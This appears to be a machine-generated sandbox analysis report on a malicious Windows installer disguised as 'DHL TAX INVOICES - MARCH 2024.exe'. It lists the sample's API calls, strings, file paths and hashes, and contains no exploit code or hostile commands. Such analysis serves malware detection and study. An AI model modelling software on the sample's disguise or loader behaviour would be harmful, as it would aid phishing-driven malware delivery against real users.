                                                            • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                            • Instruction ID: ef45ff86538a2d51f1b0222ec8c1b297abd10be8bd22699319dc95f068cee933
                                                            • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                            • Instruction Fuzzy Hash: CCE08676244108BFDB00DFA8DE47FD537ECAB14700F004031BA08D70D1C674E5508768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040336B,0040A230,0040A230,0040326F,00414ED0,00004000,?,00000000,00403119), ref: 00405DEA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                            • Instruction ID: f39de87387fc754cac4ceee649b5e38243fe2bf9183d254406dbd5143e25ae03
                                                            • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                            • Instruction Fuzzy Hash: 57E0EC3221125AABDF509F65DC08AEB7B6DEF05360F008837F955E6160D631E9219BE8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                            • Instruction ID: 8584b4a80e8197aea4c9dd325401cbfcfbe68695eba590e205f4256e4e85e437
                                                            • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                            • Instruction Fuzzy Hash: 67C04C71740600BBDA20CB649D45F1677546754740F1448697640A60E0C674D420D62C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,0040403C), ref: 0040426E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C71
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404C7C
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CC6
                                                            • LoadBitmapW.USER32(0000006E), ref: 00404CD9
                                                            • SetWindowLongW.USER32(?,000000FC,00405251), ref: 00404CF2
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D06
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D18
                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D2E
                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3A
                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D4C
                                                            • DeleteObject.GDI32(00000000), ref: 00404D4F
                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7A
                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D86
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E1C
                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E47
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E5B
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404E8A
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E98
                                                            • ShowWindow.USER32(?,00000005), ref: 00404EA9
                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FA6
                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040500B
                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405020
                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405044
                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405064
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405079
                                                            • GlobalFree.KERNEL32(?), ref: 00405089
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405102
                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004051AB
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BA
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DA
                                                            • ShowWindow.USER32(?,00000000), ref: 00405228
                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405233
                                                            • ShowWindow.USER32(00000000), ref: 0040523A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 1638840714-813528018
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040472C
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404756
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404807
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404812
                                                            • lstrcmpiW.KERNEL32(ExecToStack,00423728,00000000,?,?), ref: 00404844
                                                            • lstrcatW.KERNEL32(?,ExecToStack), ref: 00404850
                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404862
                                                              • Part of subcall function 004058A7: GetDlgItemTextW.USER32(?,?,00000400,00404899), ref: 004058BA
                                                              • Part of subcall function 00406412: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                              • Part of subcall function 00406412: CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                              • Part of subcall function 00406412: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                              • Part of subcall function 00406412: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404925
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404940
                                                              • Part of subcall function 00404A99: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                              • Part of subcall function 00404A99: wsprintfW.USER32 ref: 00404B43
                                                              • Part of subcall function 00404A99: SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: (7B$A$C:\Users\user\AppData\Local\releve$ExecToStack
                                                            • API String ID: 2624150263-569928056
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                            Strings
                                                            • C:\Users\user\AppData\Local\releve, xrefs: 00402154
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: C:\Users\user\AppData\Local\releve
                                                            • API String ID: 542301482-2510609794
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040447D
                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404491
                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044AE
                                                            • GetSysColor.USER32(?), ref: 004044BF
                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044CD
                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044DB
                                                            • lstrlenW.KERNEL32(?), ref: 004044E0
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044ED
                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404502
                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040455B
                                                            • SendMessageW.USER32(00000000), ref: 00404562
                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040458D
                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D0
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004045DE
                                                            • SetCursor.USER32(00000000), ref: 004045E1
                                                            • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 004045F6
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404602
                                                            • SetCursor.USER32(00000000), ref: 00404605
                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404634
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404646
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                            • String ID: ExecToStack$N$VC@$open
                                                            • API String ID: 3615053054-1699886250
                                                            • Opcode ID: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                            • Instruction ID: ef28e404984a924d02769b335405a58d84a4f5c10dd13b46e9d300bde90bb2c1
                                                            • Opcode Fuzzy Hash: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                            • Instruction Fuzzy Hash: 717191B1A00209BFDB10AF60DD45E6A7B69FB94344F00843AFB05B62E0D779AD51CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                            • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                            • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                            • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405EBC
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00406040,?,?), ref: 00405EE0
                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405EE9
                                                              • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                              • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                            • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F06
                                                            • wsprintfA.USER32 ref: 00405F24
                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405F5F
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F6E
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                            • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00405FFC
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040600D
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406014
                                                              • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405D57
                                                              • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                            • API String ID: 222337774-899692902
                                                            • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                            • Instruction ID: 52ae09e4e2a5e81e4d5588e003ad531eff1fe7f7ae6e2de5146a23cae23f7ad9
                                                            • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                            • Instruction Fuzzy Hash: EB315330241B19BBD2206B209D08F2B3A5CEF85758F15043BF942F62C2EA7CC9118EBD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCommandLineW.KERNEL32(00000400), ref: 1000197F
                                                            • lstrcpynW.KERNEL32(?,00000000), ref: 1000198D
                                                            • CharNextW.USER32(00000022), ref: 100019BA
                                                            • CharNextW.USER32(00000022), ref: 100019C5
                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 100019EA
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100019FC
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 10001A09
                                                            • CloseHandle.KERNEL32(?), ref: 10001A18
                                                            • CloseHandle.KERNEL32(?), ref: 10001A1D
                                                            • ExitProcess.KERNEL32 ref: 10001A22
                                                            • ExitProcess.KERNEL32 ref: 10001A2D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1636843545.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                            • String ID: "$D
                                                            • API String ID: 3771911414-1154559923
                                                            • Opcode ID: 792074d24ee166c0d63ae550d6059b886baf2d36a3c8092926d8f070f9b5f0bf
                                                            • Instruction ID: 04ec7ee55fd1c5b75376eb32569bf43fe38d23ed250b13e4565c7e467344e8e5
                                                            • Opcode Fuzzy Hash: 792074d24ee166c0d63ae550d6059b886baf2d36a3c8092926d8f070f9b5f0bf
                                                            • Instruction Fuzzy Hash: 2521217180025DBEFB10EB94CD98AEF7BBDEB04385F504066E206B60A5DB701E55DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                            • CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                            • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                            • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                            Strings
                                                            • "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe", xrefs: 00406412
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406413
                                                            • *?|<>/":, xrefs: 00406464
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-1918633348
                                                            • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                            • Instruction ID: c1b46f2de1f90aebbf911330ce555e940da56993e608f70b6a8db31027969b8c
                                                            • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                            • Instruction Fuzzy Hash: 5311C85680121299DB307B588C40AB7A2B8EF55754F52803FEDCA732C1E77C5C9286BD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004042C6
                                                            • GetSysColor.USER32(00000000), ref: 004042E2
                                                            • SetTextColor.GDI32(?,00000000), ref: 004042EE
                                                            • SetBkMode.GDI32(?,?), ref: 004042FA
                                                            • GetSysColor.USER32(?), ref: 0040430D
                                                            • SetBkColor.GDI32(?,?), ref: 0040431D
                                                            • DeleteObject.GDI32(?), ref: 00404337
                                                            • CreateBrushIndirect.GDI32(?), ref: 00404341
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                            • Instruction ID: 2a82f640caf94e13ad52f77eccc7f6a005bf570db5d4005cc44859485eb84fad
                                                            • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                            • Instruction Fuzzy Hash: 9F215171600704ABCB219F68DE08B4BBBF8AF81714F04892DED95E26A0D738E904CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                              • Part of subcall function 00405E34: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4A
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                            • String ID: 9
                                                            • API String ID: 163830602-2366072709
                                                            • Opcode ID: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
                                                            • Instruction ID: fbd7f9394f7a40dbbdef10ea3a20ac1ae57b35180e29dd1ddeb30b88b5afce05
                                                            • Opcode Fuzzy Hash: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
                                                            • Instruction Fuzzy Hash: 19510774D00219ABDF209F94CA88AAEB779FF04344F50447BE501B72E0D7B99982DB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                            • GetTickCount.KERNEL32 ref: 00402DD8
                                                            • wsprintfW.USER32 ref: 00402E06
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                              • Part of subcall function 004052DD: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                              • Part of subcall function 004052DD: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                              • Part of subcall function 00402D83: MulDiv.KERNEL32(0005B2EB,00000064,0005EA5E), ref: 00402D98
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                            • String ID: ... %d%%
                                                            • API String ID: 722711167-2449383134
                                                            • Opcode ID: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
                                                            • Instruction ID: 67f39cb704aca6262626a7976268bb3bb8a333bdab68892006d91dd8afb4411f
                                                            • Opcode Fuzzy Hash: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
                                                            • Instruction Fuzzy Hash: 96016D70541614EBC721AB60EF4DA9B7A68AF00706B14417FF885F12E0CBF85865CBEE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC2
                                                            • GetMessagePos.USER32 ref: 00404BCA
                                                            • ScreenToClient.USER32(?,?), ref: 00404BE4
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BF6
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                            • Instruction ID: 45e0f6331f39cfe7836e80c9775163861a3897288b26a0b158bc224782e9bc0b
                                                            • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                            • Instruction Fuzzy Hash: C9015271901218BAEB00DB94DD45FFEBBBCAF54711F10012BBA51B61D0C7B495018B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401D59
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                            • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401DD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID: Tahoma
                                                            • API String ID: 3808545654-3580928618
                                                            • Opcode ID: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
